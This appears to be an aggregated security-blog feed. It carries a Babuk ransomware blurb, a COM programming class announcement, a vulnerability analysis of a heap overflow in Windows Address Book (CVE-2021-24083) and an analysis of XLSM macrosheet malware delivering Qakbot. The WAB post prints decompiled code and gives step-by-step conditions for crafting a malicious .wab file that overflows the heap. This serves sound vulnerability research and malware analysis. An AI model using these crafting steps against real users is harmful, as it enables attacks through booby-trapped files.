  • A recent forum announcement indicates that the Babuk operators are now expressly targeting Linux/UNIX systems, as well as ESXi and VMware systems
  • Babuk is riddled with coding mistakes, making recovery of data impossible for some victims, even if they pay the ransom
  • We believe these flaws in the ransomware have led the threat actor to move to data theft and extortion rather than encryption

Learn more about how Babuk is transitioning away from an encryption/ransom model to one focused on pure data theft and extortion in our detailed technical analysis.

The post Babuk: Biting off More than they Could Chew by Aiming to Encrypt VM and *nix Systems? appeared first on McAfee Blog.

New Class: COM Programming

1 August 2021 at 15:54

Today I’m announcing a new training – COM (Component Object Model) Programming, to be held in November.

COM is a well established technology, debuted back in 1993, and is still very much in use. In fact, the Windows Runtime is based on an enhanced version of COM. There is quite a bit of confusion and misconceptions about COM, which is one reason I decided to offer this class.

The syllabus for the 3 day class can be found here. This is the first time I will be offering this class, and also will try a new format: 6 half-days instead of 3 full days.

When: November: 8, 9, 10, 11, 15, 16. 2pm to 6pm, UT. (Technically it’s more than 3 days, as with a full day there is a lunch break not present in half days). The class will be conducted remotely using Microsoft Teams or a similar platform.

What you need to know before the class: You should be comfortable using Windows on a Power User level. Concepts such as processes, threads, DLLs, and virtual memory should be understood fairly well. You should have experience writing code in C and some C++. You don’t have to be an expert, but you must know C and basic C++ to get the most out of the class. In case you have doubts, talk to me.

Obviously, participants in my Windows Internals and (especially) Windows System Programming classes have the required knowledge for the class.

We’ll start by looking at why COM was created in the first place, and then build clients and servers, digging into various mechanisms COM provides. See the syllabus for more details.

Registration will be different than previous classes:
Early bird (paid by September 30th): 500 USD (if paid by an individual), 1100 USD (if paid by a company).
Normal (paid after September 30th): 700 USD (if paid by an individual), 1300 USD (if paid by a company).

To register, send an email to [email protected] with the title “COM Training”, and write the name(s), email(s) and time zone(s) of the participants. Multiple participants from the same company get a discount. Previous participants (individuals) of my classes get 10% off. I will reply with further instructions.

I hope to see you in November!



Analysis of a Heap Buffer-Overflow Vulnerability in Microsoft Windows Address Book

5 August 2021 at 12:26

By Eneko Cruz Elejalde


This post analyzes a heap-buffer overflow in Microsoft Windows Address Book. Microsoft released an advisory for this vulnerability for the 2021 February patch Tuesday. This post will go into detail about what Microsoft Windows Address Book is, the vulnerability itself, and the steps to craft a proof-of-concept exploit that crashes the vulnerable application.

Windows Address Book

Windows Address Book is a part of the Microsoft Windows operating system and is a service that provides users with a centralized list of contacts that can be accessed and modified by both Microsoft and third party applications. The Windows Address Book maintains a local database and interface for finding and editing information about contacts, and can query network directory servers using Lightweight Directory Access Protocol (LDAP). The Windows Address Book was introduced in 1996 and was later replaced by Windows Contacts in Windows Vista and subsequently by the People App in Windows 10.

The Windows Address Book provides an API that enables other applications to directly use its database and user interface services to enable services to access and modify contact information. While Microsoft has replaced the application providing the Address Book functionality, newer replacements make use of old functionality and ensure backwards compatibility. The Windows Address Book functionality is present in several Windows Libraries that are used by Windows 10 applications, including Outlook and Windows Mail. In this way, modern applications make use of the Windows Address Book and can even import address books from older versions of Windows.


A heap-buffer overflow vulnerability exists within the SecurityCheckPropArrayBuffer() function within wab32.dll when processing nested properties of a contact. The network-based attack vector involves enticing a user to open a crafted .wab file containing a malicious composite property in a WAB record.


The vulnerability analysis that follows is based on Windows Address Book Contacts DLL (wab32.dll) version 10.0.19041.388 running on Windows 10 x64.

The Windows Address Book Contacts DLL (i.e. wab32.dll) provides access to the Address Book API and it is used by multiple applications to interact with the Windows Address Book. The Contacts DLL handles operations related to contact and identity management. Among others, the Contacts DLL is able to import an address book (i.e, a WAB file) exported from an earlier version of the Windows Address Book.

Earlier versions of the Windows Address Book maintained a database of identities and contacts in the form of a .wab file. While current versions of Windows do not use a .wab file by default anymore, they allow importing a WAB file from an earlier installation of the Windows Address Book.

There are multiple ways of importing a WAB file into the Windows Address Book, but it was observed that applications rely on the Windows Contacts Import Tool (i.e, C:\Program Files\Windows Mail\wabmig.exe) to import an address book. The Import Tool loads wab32.dll to handle loading a WAB file, extracting relevant contacts, and importing them into the Windows Address Book.

WAB File Format

The WAB file format (commonly known as Windows Address Book or Outlook Address Book) is an undocumented and proprietary file format that contains personal identities. Identities may in turn contain contacts, and each contact might contain one or more properties.

Although the format is undocumented, the file-format has been partially reverse-engineered by a third party. The following structures were obtained from a combination of a publicly available third-party application and the disassembly of wab32.dll. Consequently, there may be inaccuracies in structure definitions, field names, and field types.

The WAB file has the following structure:

Offset      Length (bytes)    Field                   Description
---------   --------------    --------------------    -------------------
0x0         16                Magic Number            Sixteen magic bytes
0x10        4                 Count 1                 Unknown Integer
0x14        4                 Count 2                 Unknown Integer
0x18        16                Table Descriptor 1      Table descriptor
0x28        16                Table Descriptor 2      Table descriptor
0x38        16                Table Descriptor 3      Table descriptor
0x48        16                Table Descriptor 4      Table descriptor
0x58        16                Table Descriptor 5      Table descriptor
0x68        16                Table Descriptor 6      Table descriptor

All multi-byte fields are represented in little-endian byte order unless otherwise specified. All string fields are in Unicode, encoded in the UTF16-LE format.

The Magic Number field contains the following sixteen bytes: 9c cb cb 8d 13 75 d2 11 91 58 00 c0 4f 79 56 a4. While some sources list the sequence of bytes 81 32 84 C1 85 05 D0 11 B2 90 00 AA 00 3C F6 76 as a valid magic number for a WAB file, it was found experimentally that replacing the sequence of bytes prevents the Windows Address Book from processing the file.

Each of the six Table Descriptor fields numbered 1 through 6 has the following structure:

Offset    Length    Field    Description
-------   --------  -------  -------------------
0x0       4         Type     Type of table descriptor
0x4       4         Size     Size of the record described
0x8       4         Offset   Offset of the record described relative to the beginning of file
0xC       4         Count    Number of records present at offset

The following are examples of some known types of table descriptor:

  • Text Record (Type: 0x84d0): A record containing a Unicode string.
  • Index Record (Type: 0xFA0): A record that may contain several descriptors to WAB records.

Each text record has the following structure:

Offset   Length (bytes)    Field          Description
------   --------------    ------------   -------------------
0x0      N                 Content        Text content of the record; a null terminated UNICODE string
0x0+N    0x4               RecordId       A record identifier for the text record 

Similarly, each index record has the following structure

Offset      Length (bytes)    Field        Description
---------   --------------    ----------   -------------------
0x0         4                 RecordId     A record identifier for the index record
0x4         4                 Offset       Offset of the record relative to the beginning of the file

Each entry in the index record (i.e, each index record structure in succession) has an offset that points to a WAB record.

WAB Records

A WAB record is used to describe a contact. It contains fields such as email addresses and phone numbers stored in properties, which may be of various types such as string, integer, GUID, and timestamp. Each WAB record has the following structure:

Offset      Length   Field              Description
---------   ------   ---------------    -------------------
0x0         4        Unknown1           Unknown field
0x4         4        Unknown2           Unknown field
0x8         4        RecordId           A record identifier for the WAB record
0xC         4        PropertyCount      The number of properties contained in RecordProperties
0x10        4        Unknown3           Unknown field 
0x14        4        Unknown4           Unknown field 
0x18        4        Unknown5           Unknown field 
0x1C        4        DataLen            The length of the RecordProperties field (M)
0x20        M        RecordProperties   Succession of subproperties belonging to the WAB record

The following fields are relevant:

  • The RecordProperties field is a succession of record property structures.
  • The PropertyCount field indicates the number of properties within the RecordProperties field.

Record properties can be either simple or composite.

Simple Properties

Simple properties have the following structure:

Offset      Length (bytes)    Field       Description
---------   --------------    ---------   -------------------
0x0         0x2               Tag         A property tag describing the type of the contents
0x2         0x2               Unknown     Unknown field
0x4         0x4               Size        Size in bytes of Value member (X)
0x8         X                 Value       Property value or content

Tags of simple properties are smaller than 0x1000, and include the following:

Tag Name        Tag Value    Length      Description
---------       -----------  ---------   -------------------
PtypInteger16   0x00000002   2           A 16-bit integer
PtypInteger32   0x00000003   4           A 32-bit integer
PtypFloating32  0x00000004   4           A 32-bit floating point number
PtypFloating64  0x00000005   8           A 64-bit floating point number
PtypBoolean     0x0000000B   2           Boolean, restricted to 1 or 0
PtypString8     0x0000001E   Variable    A string of multibyte characters in externally specified
                                         encoding with terminating null character (single 0 byte)
PtypBinary      0x00000102   Variable    A COUNT field followed by that many bytes
PtypString      0x0000001F   Variable    A string of Unicode characters in UTF-16LE format encoding
                                         with terminating null character (0x0000).
PtypGuid        0x00000048   16          A GUID with Data1, Data2, and Data3 filds in little-endian
PtypTime        0x00000040   8           A 64-bit integer representing the number of 100-nanosecond
                                         intervals since January 1, 1601
PtypErrorCode   0x0000000A   4           A 32-bit integer encoding error information

Note the following:

  • The aforementioned list is not exhaustive. For more property tag definitions, see this.
  • The value of PtypBinary is prefixed by a COUNT field, which counts 16-bit words.
  • In addition to the above, the following properties also exist; their usage in WAB is unknown.
    • PtypEmbeddedTable (0x0000000D): The property value is a Component Object Model (COM) object.
    • PtypNull (0x00000001): None: This property is a placeholder.
    • PtypUnspecified (0x00000000): Any: this property type value matches any type;

Composite Properties

Composite properties have the following structure:

Offset  Length     Field             Description
------  ---------  ----------------- -------------------
0x0     0x2        Tag               A property tag describing the type of the contents
0x2     0x2        Unknown           Unknown field
0x4     0x4        NestedPropCount   Number of nested properties contained in the current WAB property
0x8     0x4        Size              Size in bytes of Value member (X)
0xC     X          Value             Property value or content

Tags of composite properties are greater than or equal to 0x1000, and include the following:

Tag Name                Tag Value
---------               ----------
PtypMultipleInteger16   0x00001002
PtypMultipleInteger32   0x00001003
PtypMultipleString8     0x0000101E
PtypMultipleBinary      0x00001102
PtypMultipleString      0x0000101F
PtypMultipleGuid        0x00001048
PtypMultipleTime        0x00001040

The Value field of each composite property contains NestedPropCount number of Simple properties of the corresponding type.

In case of fixed-sized properties (PtypMultipleInteger16, PtypMultipleInteger32, PtypMultipleGuid, and PtypMultipleTime), the Value field of a composite property contains NestedPropCount number of the Value field of the corresponding Simple property.

For example, in a PtypMultipleInteger32 structure with NestedPropCount of 4:

  • The Size is always 16.
  • The Value contains four 32-bit integers.

In case of variable-sized properties (PtypMultipleString8, PtypMultipleBinary, and PtypMultipleString), the Value field of the composite property contains NestedPropCount number of Size and Value fields of the corresponding Simple property.

For example, in a PtypMultipleString structure with NestedPropCount of 2 containing the strings “foo” and “bar” in Unicode:

  • The Size is 14 00 00 00.
  • The Value field contains a concatenation of the following two byte-strings:
    • “foo” encoded with a four-byte length: 06 00 00 00 66 00 6f 00 6f 00.
    • “bar” encoded with a four-byte length: 06 00 00 00 62 00 61 00 72 00.

Technical Details

The vulnerability in question occurs when a malformed Windows Address Book in the form of a WAB file is imported. When a user attempts to import a WAB file into the Windows Address Book, the method WABObjectInternal::Import() is called, which in turn calls ImportWABFile(). For each contact inside the WAB file, ImportWABFile() performs the following nested calls: ImportContact(), CWABStorage::ReadRecord(), ReadRecordWithoutLocking(), and finally HrGetPropArrayFromFileRecord(). This latter function receives a pointer to a file as an argument and reads the contact header and extracts PropertyCount and DataLen. The function HrGetPropArrayFromFileRecord() in turn calls SecurityCheckPropArrayBuffer() to perform security checks upon the imported file and HrGetPropArrayFromBuffer() to read the contact properties into a property array.

The function HrGetPropArrayFromBuffer() relies heavily on the correctness of the checks performed by SecurityCheckPropArrayBuffer(). However, the function fails to implement security checks upon certain property types. Specifically, SecurityCheckPropArrayBuffer() may skip checking the contents of nested properties where the property tag is unknown, while the function HrGetPropArrayFromBuffer() continues to process all nested properties regardless of the security check. As a result, it is possible to trick the function HrGetPropArrayFromBuffer() into parsing an unchecked contact property. As a result of parsing such a property, the function HrGetPropArrayFromBuffer() can be tricked into overflowing a heap buffer.

Code Analysis

The following code blocks show the affected parts of methods relevant to this vulnerability. Code snippets are demarcated by reference markers denoted by [N]. Lines not relevant to this vulnerability are replaced by a [Truncated] marker.

The following is the pseudocode of the function HrGetPropArrayFromFileRecord:


if ( !(unsigned int)SecurityCheckPropArrayBuffer(wab_buffer_full, HIDWORD(uBytes[1]), wab_buffer[3]) )

    result = 0x8004011b;        // Error
    goto LABEL_25;              // Return prematurely

  result = HrGetPropArrayFromBuffer(wab_buffer_full, HIDWORD(uBytes[1]), wab_buffer[3], 0, a7);

At [1] the function SecurityCheckPropArrayBuffer() is called to perform a series of security checks upon the buffer received and the properties contained within. If the check is positive, then the input is trusted and processed by calling HrGetPropArrayFromBuffer() at [3]. Otherwise, the function returns with an error at [2].

The following is the pseudocode of the function SecurityCheckPropArrayBuffer():

    __int64 __fastcall SecurityCheckPropArrayBuffer(unsigned __int8 *buffer_ptr, unsigned int buffer_length, int header_dword_3)
      unsigned int security_check_result; // ebx
      unsigned int remaining_buffer_bytes; // edi
      int l_header_dword_3; // er15
      unsigned __int8 *ptr_to_buffer; // r9
      int current_property_tag; // ecx
      __int64 c_dword_2; // r8
      unsigned int v9; // edi
      int VA; // ecx
      int VB; // ecx
      int VC; // ecx
      int VD; // ecx
      int VE; // ecx
      int VF; // ecx
      int VG; // ecx
      int VH; // ecx
      signed __int64 res; // rax
      _DWORD *ptr_to_dword_1; // rbp
      unsigned __int8 *ptr_to_dword_0; // r14
      unsigned int dword_2; // eax
      unsigned int v22; // edi
      int v23; // esi
      int v24; // ecx
      unsigned __int8 *c_ptr_to_property_value; // [rsp+60h] [rbp+8h]
      unsigned int v27; // [rsp+68h] [rbp+10h]
      unsigned int copy_dword_2; // [rsp+70h] [rbp+18h]

      security_check_result = 0;
      remaining_buffer_bytes = buffer_length;
      l_header_dword_3 = header_dword_3;
      ptr_to_buffer = buffer_ptr;
      if ( header_dword_3 )                      
        while ( remaining_buffer_bytes > 4 )        


          if ( *(_DWORD *)ptr_to_buffer & 0x1000 )  


            current_property_tag = *(unsigned __int16 *)ptr_to_buffer;
            if ( current_property_tag == 0x1102 ||                    
                 (unsigned int)(current_property_tag - 0x101E) <= 1 ) 

              ptr_to_dword_1 = ptr_to_buffer + 4;                     
              ptr_to_dword_0 = ptr_to_buffer;
              if ( remaining_buffer_bytes < 0xC )                     
                return security_check_result;                         
              dword_2 = *((_DWORD *)ptr_to_buffer + 2);
              v22 = remaining_buffer_bytes - 0xC;
              if ( dword_2 > v22 )                                     
                return security_check_result;                         
              ptr_to_buffer += 12;
              copy_dword_2 = dword_2;
              remaining_buffer_bytes = v22 - dword_2;
              c_ptr_to_property_value = ptr_to_buffer;                
              v23 = 0;                                                
              if ( *ptr_to_dword_1 > 0u )
                while ( (unsigned int)SecurityCheckSingleValue(
                                        *(_DWORD *)ptr_to_dword_0,
                                        ©_dword_2) )
                  if ( (unsigned int)++v23 >= *ptr_to_dword_1 )       
                    ptr_to_buffer = c_ptr_to_property_value;
                    goto LABEL_33;
                return security_check_result;

              if ( remaining_buffer_bytes < 0xC )
                return security_check_result;
              c_dword_2 = *((unsigned int *)ptr_to_buffer + 2);       
              v9 = remaining_buffer_bytes - 12;
              if ( (unsigned int)c_dword_2 > v9 )                     
                return security_check_result;                         
              remaining_buffer_bytes = v9 - c_dword_2;
              VA = current_property_tag - 0x1002;                     
              if ( VA )
                VB = VA - 1;
                if ( VB && (VC = VB - 1) != 0 )
                  VD = VC - 1;
                  if ( VD && (VE = VD - 1) != 0 && (VF = VE - 1) != 0 && (VG = VF - 13) != 0 && (VH = VG - 44) != 0 )
                    res = VH == 8 ? 16i64 : 0i64;
                    res = 8i64;
                  res = 4i64;
                res = 2i64;
              if ( (unsigned int)c_dword_2 / *((_DWORD *)ptr_to_buffer + 1) != res ) 
                return security_check_result;                                        

              ptr_to_buffer += c_dword_2 + 12;


            if ( remaining_buffer_bytes < 4 )       
              return security_check_result;
            v24 = *(_DWORD *)ptr_to_buffer;         
            c_ptr_to_property_value = ptr_to_buffer + 4;// new exe: v13 = buffer_ptr + 4;
            v27 = remaining_buffer_bytes - 4;       
            if ( !(unsigned int)SecurityCheckSingleValue(v24, &c_ptr_to_property_value, &v27) )
              return security_check_result;
            remaining_buffer_bytes = v27;
            ptr_to_buffer = c_ptr_to_property_value;
          if ( !--l_header_dword_3 )
      if ( !l_header_dword_3 )
        security_check_result = 1;
      return security_check_result;

At [4] the tag of the property being processed is checked. The checks performed depend on whether the property processed in each iteration is a simple or a composite property. For simple properties (i.e, properties with tag lower than 0x1000), execution continues at [8]. The following checks are done for simple properties:

  1. If the remaining number of bytes in the buffer is fewer than 4, the function returns with an error.
  2. A pointer to the property value is obtained and SecurityCheckSingleValue() is called to perform a security check upon the simple property and its value. SecurityCheckSingleValue() performs a security check and increments the pointer to point at the next property in the buffer, so that SecurityCheckPropArrayBuffer() can check the next property on the next iteration.
  3. The number of total properties is decremented and compared to zero. If equal to zero, then the function returns successfully. If different, the next iteration of the loop checks the next property.

Similarly, for composite properties (i.e, properties with tag equal or higher than 0x1000) execution continues at [5] and the following is done.

For variable length composite properties (if the property tag is equal to 0x1102 (PtypMultipleBinary) or equal or smaller than 0x101f (PtypMultipleString)), the code at [6] does the following:

  1. The number of bytes left to read in the buffer is compared with 0xC to avoid overrunning the buffer.
  2. The Size field of the property is compared to the remaining buffer length to avoid overrunning the buffer.
  3. For each nested property, the function SecurityCheckSingleValue() is called. It:
    1. Performs a security check on the nested property.
    2. Advances the pointer to the buffer held by the caller, in order to point to the next nested property.
  4. The loop runs until the number of total properties in the contact (decremented in each iteration) is zero.

For fixed-length composite properties (if the property tag in question is different from 0x1102 (PtypMultipleBinary) and larger than 0x101f (PtypMultipleString)), the following happens starting at [7]:

  1. The number of bytes left to read in the buffer is compared with 0xC to avoid overrunning the buffer.
  2. The Size is compared to the remaining buffer length to avoid overrunning the buffer.
  3. The size of each nested property, which depends only on the property tag, is calculated from the parent property tag.
  4. The Size is divided by NestedPropCount to obtain the size of each nested property.
  5. The function returns with an error if the calculated subproperty size is different from the property size deduced from parent property tag.
  6. The buffer pointer is incremented by the size of the parent property value to point to the next property.

Unknown or non-processable property types are assigned the nested property size 0x0.

It was observed that if the calculated property size is zero, the buffer pointer is advanced by the size of the property value, as described by the header. The buffer is advanced regardless of the property size and by advancing the buffer, the security check permits the value of the parent property (which may include subproperties) to stay unchecked. For the security check to pass the result of the division performed on Step 4 for fixed-length composite properties must be zero. Therefore for an unknown or non-processable property to pass the security check, NestedPropCount must be larger than Size. Note that since the size of any property in bytes is at least two, NestedPropCount must always be no larger than half of Size, and therefore, the aforementioned division must never be zero in benign cases.

After the checks have concluded, the function returns zero for a failed check and one for a passed check.

Subsequently, the function HrGetPropArrayFromFileRecord() calls HrGetPropArrayFromBuffer(), which aims to collect the properties into an array of _SPropValue structs and return it to the caller. The _SPropValue array has a length equal of the number of properties (as given by the contact header) and is allocated in the heap through a call to LocalAlloc(). The number of properties is multiplied by sizeof(_SPropValue) to yield the total buffer size. The following fragment shows the allocation taking place:

    if ( !property_array_r )
        ret = -2147024809;
        goto LABEL_71;
    *property_array_r = 0i64;
    header_dword_3_1 = set_to_zero + header_dword_3;


    if ( (unsigned int)header_dword_3_1 < header_dword_3       
      || (unsigned int)header_dword_3_1 > 0xAAAAAAA            
      || (v10 = (unsigned int)header_dword_3_1,                               
          property_array = (struct _SPropValue *)LocalAlloc(
                                                   0x18 * header_dword_3_1),
                                                   // sizeof(_SPropValue) * n_properties_in_binary
        (*property_array_r = property_array) == 0i64) )
        ret = 0x8007000E;
        goto LABEL_71;

An allocation of sizeof(_SPropValue) * n_properties_in_binary can be observed at [9]. Immediately after, each of the property structures are initialized and their property tag member is set to 1. After initialization, the buffer, on which security checks have already been performed, is processed property by property, advancing the property a pointer to the next property with the property header and value sizes provided by the property in question.

If the property processed by the specific loop iteration is a simple property, the following code is executed:

    if ( !_bittest((const signed int *)¤t_property_tag, 0xCu) )
      if ( v16 < 4 )
      dword_1 = wab_ulong_buffer_full[1];
      ptr_to_dword_2 = (char *)(wab_ulong_buffer_full + 2);
      v38 = v16 - 4;
      if ( (unsigned int)dword_1 > v38 )
      current_property_tag = (unsigned __int16)current_property_tag;
      if ( (unsigned __int16)current_property_tag > 0xBu )


        v39 = current_property_tag - 0x1E;
        if ( !v39 )
          goto LABEL_79;
        v40 = v39 - 1;
        if ( !v40 )
          goto LABEL_79;
        v41 = v40 - 0x21;
        if ( !v41 )
          goto LABEL_56;
        v42 = v41 - 8;
        if ( v42 )
          if ( v42 != 0xBA )
            goto LABEL_56;
          v43 = dword_1;
          (*property_array_r)[p_idx].Value.bin.lpb = (LPBYTE)LocalAlloc(0x40u, dword_1);
          if ( !(*property_array_r)[p_idx].Value.bin.lpb )
          (*property_array_r)[p_idx].Value.l = dword_1;
          v44 = *(&(*property_array_r)[p_idx] + 1);

          v43 = dword_1;
          (*property_array_r)[p_idx].Value.cur.int64 = (LONGLONG)LocalAlloc(0x40u, dword_1);
          v44 = (*property_array_r)[p_idx].Value.dbl;
          if ( v44 == 0.0 )
        memcpy_0(*(void **)&v44, ptr_to_dword_2, v43);
        wab_ulong_buffer_full = (ULONG *)&ptr_to_dword_2[v43];

        memcpy_0(&(*property_array_r)[v15].Value, ptr_to_dword_2, dword_1);
        wab_ulong_buffer_full = (ULONG *)&ptr_to_dword_2[dword_1];
      remaining_bytes_to_process = v38 - dword_1;
      goto NEXT_PROPERTY;


        processed_property_count = (unsigned int)(processed_property_count_1 + 1);
        processed_property_count_1 = processed_property_count;
        if ( (unsigned int)processed_property_count >= c_header_dword_3 )
          return 0;

At [10] the property tag is extracted and compared with several constants. If the property tag is 0x1e (PtypString8), 0x1f (PtypString), or 0x48 (PtypGuid), then execution continues at [11]. If the property tag is 0x40 (PtypTime) or is not recognized, execution continues at [12]. The memcpy call at [12] is prone to a heap overflow.

Conversely, if the property being processed in the specific loop iteration is not a simple property, the following code is executed. Notably, when the following code is executed, the pointer DWORD* wab_ulong_buffer_full points to the property tag of the property being processed. Regardless of which composite property is being processed, before the property tag is identified the buffer is advanced to point to the beginning of the property value, which is at the 4th 32-bit integer.


    if ( v16 < 4 )
    c_dword_1 = wab_ulong_buffer_full[1];
    v19 = v16 - 4;
    if ( v19 < 4 )
    dword_2 = wab_ulong_buffer_full[2];
    wab_ulong_buffer_full += 3;                     

    remaining_bytes_to_process = v19 - 4;


    if ( (unsigned __int16)current_property_tag >= 0x1002u )
    if ( (unsigned __int16)current_property_tag <= 0x1007u || (unsigned __int16)current_property_tag == 0x1014 )
        goto LABEL_80;
    if ( (unsigned __int16)current_property_tag == 0x101E )
    if ( (unsigned __int16)current_property_tag == 0x101F )
    if ( ((unsigned __int16)current_property_tag - 0x1040) & 0xFFFFFFF7 )
        if ( (unsigned __int16)current_property_tag == 0x1102 )


        (*property_array_r)[p_idx].Value.bin.lpb = (LPBYTE)LocalAlloc(0x40u, dword_2);
        if ( !(*property_array_r)[p_idx].Value.bin.lpb )
        (*property_array_r)[p_idx].Value.l = c_dword_1;
        if ( (unsigned int)dword_2 > remaining_bytes_to_process )
        memcpy_0((*property_array_r)[p_idx].Value.bin.lpb, wab_ulong_buffer_full, dword_2);
        wab_ulong_buffer_full = (ULONG *)((char *)wab_ulong_buffer_full + dword_2);
        remaining_bytes_to_process -= dword_2;

        processed_property_count = (unsigned int)(processed_property_count_1 + 1);
        processed_property_count_1 = processed_property_count;
        if ( (unsigned int)processed_property_count >= c_header_dword_3 )
        return 0;

After the buffer has been advanced at [13], the property tag is compared with several constants starting at [14]. Finally, the code fragment at [15] attempts to process a composite property (i.e. >= 0x1000) with a tag not contemplated by the previous constants.

Although the processing logic of each type of property is irrelevant, an interesting fact is that if the property tag is not recognized, the buffer pointer has still been advanced to the end of the end of its header, and it’s never retracted. This happens if all of the following conditions are met:

  • The property tag is larger or equal than 0x1002.
  • The property tag is larger than 0x1007.
  • The property tag is different from 0x1014.
  • The property tag is different from 0x101e.
  • The property tag is different from 0x101f.
  • The property tag is different from 0x1102.
  • The result of subtracting 0x1040 from the property tag, and performing a bitwise AND of the result with 0xFFFFFFF7 is nonzero.

Interestingly, if all of the above conditions are met, the property header of the composite property is skipped, and the next loop iteration will interpret its property body as a different property.

Therefore, it is possible to overflow the _SPropValue array allocated in the heap by HrGetPropArrayFromBuffer() by using the following observations:

  • A specially crafted composite unknown or non-processable property can be made to bypass security checks if NestedPropCount is larger than Size.
  • HrGetPropArrayFromBuffer() can be made to interpret the Value of a specially crafted property as a separate property.


In order to create a malicious WAB file from a benign WAB file, export a valid WAB file from an instance of the Windows Address Book. It is noted that Outlook Express on Windows XP includes the ability to export contacts as a WAB file.

The benign WAB file can be modified to make it malicious by altering a contact inside it to have the following characteristics:

  • A nested property containing the following:
  • A tag of an unknown or unprocessable type, for example the tag 0x1058, with the following conditions:
    • Must be larger or equal than 0x1002.
    • Must be larger than 0x1007.
    • Must be different from 0x1014, 0x101e, 0x101f, and 0x1102.
    • The result of subtracting 0x1040 from the property tag, and performing a bitwise AND of the result with 0xFFFFFFF7 is non-zero.
    • Must be different from 0x1002, 0x1003, 0x1004, 0x1005, 0x1006, 0x1007, 0x1014, 0x1040, and 0x1048.
    • NestedPropCount is larger than Size.
    • The Value of the composite property is empty.
    • A malicious simple property containing the following:
    • A property tag different from 0x1e, 0x1f, 0x40 and 0x48. For example, the tag 0x0.
    • The Size value is larger than 0x18 x NestedPropCount in order to overflow the _SPropValue array buffer.
    • An unspecified number of trailing bytes, that will overflow the _SPropValue array buffer.

Finally, when an attacker tricks an unsuspecting user into importing the specially crafted WAB file, the vulnerability is triggered and code execution could be achieved. Failed exploitation attempts will most likely result in a crash of the Windows Address Book Import Tool.

Due to the presence of ASLR and a lack of a scripting engine, we were unable to obtain arbitrary code execution in Windows 10 from this vulnerability.


Hopefully you enjoyed this dive into CVE-2021-24083, and if you did, go ahead and check out our other blog post on a use-after-free vulnerability in Adobe Acrobat Reader DC. If you haven’t already, make sure to follow us on Twitter to keep up to date with our work. Happy hacking!

The post Analysis of a Heap Buffer-Overflow Vulnerability in Microsoft Windows Address Book appeared first on Exodus Intelligence.

XLSM Malware with MacroSheets

6 August 2021 at 20:29

Written by: Lakshya Mathur

Excel-based malware has been around for decades and has been in the limelight in recent years. During the second half of 2020, we saw adversaries using Excel 4.0 macros, an old technology, to deliver payloads to their victims. They were mainly using workbook streams via the XLSX file format. In these streams, adversaries were able to enter code straight into cells (that’s why they were called macro-formulas). Excel 4.0 also used API level functions like downloading a file, creation of files, invocation of other processes like PowerShell, cmd, etc.  

With the evolution of technology, AV vendors started to detect these malicious Excel documents effectively and so to have more obfuscation and evasion routines attackers began to shift to the XLSM file format. In the first half of 2021, we have seen a surge of XLSM malware delivering different family payloads (as shown in below infection chart). In XLSM adversaries make use of Macrosheets to enter their malicious code directly into the cell formulas. XLSM structure is the same as XLSX, but XLSM files support VBA macros which are more advanced technology of Excel 4.0 macros. Using these macrosheets, attackers were able to access powerful windows functionalities and since this technique is new and highly obfuscated it can evade many AV detections. 

Excel 4.0 and XLSM are both known to download other malware payloads like ZLoader, Trickbot, Qakbot, Ursnif, IcedID, etc. 

Field hits for XLSM macrosheet malware detection
Field hits for XLSM macrosheet malware detection

The above figure shows the Number of samples weekly detected by the detected name “Downloader-FCEI” which specifically targets XLSM macrosheet based malware. 

Detailed Technical Analysis 

XLSM Structure 

XLSM files are spreadsheet files that support macros. A macro is a set of instructions that performs a record of steps repeatedly. XLSM files are based upon Open XLM formats that were introduced in Microsoft Office 2007. These file types are like XLSX but in addition, they support macros. 

Talking about the XLSM structure when we unzip the file, we see four basic contents of the file, these are shown below. 

Figure-1: Content inside XLSM file
Figure-1: Content inside XLSM file
  • _rels contains the starting package-level relationship. 
  • docProps contains the metadata of the excel file. 
  • xl folder contains the actual contents of the file. 
  • [Content_Types].xml has references to the XML files present within the above folders. 

We will focus more on the “xl” folder contents. This folder contains all the excel file main contents like all the worksheets, media files, styles.xml file, sharedStrings.xml file, workbook.xml file, etc. All these files and folders have data related to different aspects of the excel file. But for XLSM files we will focus on one unique folder called macrosheets. 

These XLSM files contain macrosheets as shown in figure-2 which are nothing but XML sheet files that can support macros. These sheets are not available in other Excel file formats. In the past few months, we have seen a huge surge in XLSM file-type malware in which attackers store malicious strings hidden within these macrosheets. We will see more details about such malware in this blog. 

Figure-2: Macrosheets folder inside xl folder
Figure-2: Macrosheets folder inside xl folder

To explain further how attackers uses XLSM files we have taken a Qakbot sample with SHA 91a1ba70132139c99efd73ca21c4721927a213bcd529c87e908a9fdd71570f1e. 

Infection Chain

Figure-3: Infection chain for Qakbot Malware
Figure-3: Infection chain for Qakbot Malware

The infection chain for both Excel 4.0 Qakbot and XLSM Qakbot is similar. They both downloads dll and execute it using rundll32.exe with DllResgisterServer as the export function. 

XLSM Threat Analysis 

On opening the XLSM file there is an image that prompts the user to enable the content. To look legitimate and clean malicious actors use a very official-looking template as shown below.

Figure-4: Image of Xlsm file face
Figure-4 Image of Xlsm file face

On digging deeper, we see its internal workbook.xml file. 

Figure-5: workbook.xml content
Figure-5: workbook.xml content

Now as we can see in the workbook.xml file (Figure-5), there is a total of 6 sheets and their state is hidden. Also, two cells have a predefined name and one of them is Sheet2323!$A$1 defined as “_xlnm.Auto_Open” which is similar to Sub Auto_Open() as we generally see in macro files. It automatically runs the macros when the user clicks on Enable Content.  

As we saw in Figure-3 on opening the file, we only see the enable content image. Since the state of sheets was hidden, we can right-click on the main sheet tab and we will see unhide option there, then we can select each sheet to unhide it. On hiding the sheet and change the font color to red we saw some random strings as seen in figure 6. 

Figure-6: Sheet face of xlsm file
Figure-6: Sheet face of xlsm file

These hidden sheets contain malicious strings in an obfuscated manner. So, on analyzing more we observed that sheets inside the macrosheets folder contain these malicious strings. 

Figure-7: Content of macrosheet XML file
Figure-7: Content of macrosheet XML file

Now as we can in figure-7 different tags are used in this XML sheet file. All the malicious strings are present in two tags <f> and <v> tags inside <sheetdata> tags. Now let’s look more in detail about these tags. 

<v> (Cell Value) tags are used to store values inside the cell. <f> (Cell Formula) tags are used to store formulas inside the cell. Now in the above sheet <v> tags contain the cached formula value based on the last time formula was calculated. Formula cells contain formulas like “GOTO(Sheet2!H13)”, now as we can see here attackers can store different formulas while referencing cells from different sheets. These operations are done to produce more and more obfuscated sheets and evade AV signatures. 

When the user clicks on the enable content button the execution starts from the Auto_Open cell, after which each sheet formula will start to execute one by one. The final deobfuscated string is shown below. 

Figure-8: Final De-Obfuscated strings from the file
Figure-8: Final De-Obfuscated strings from the file

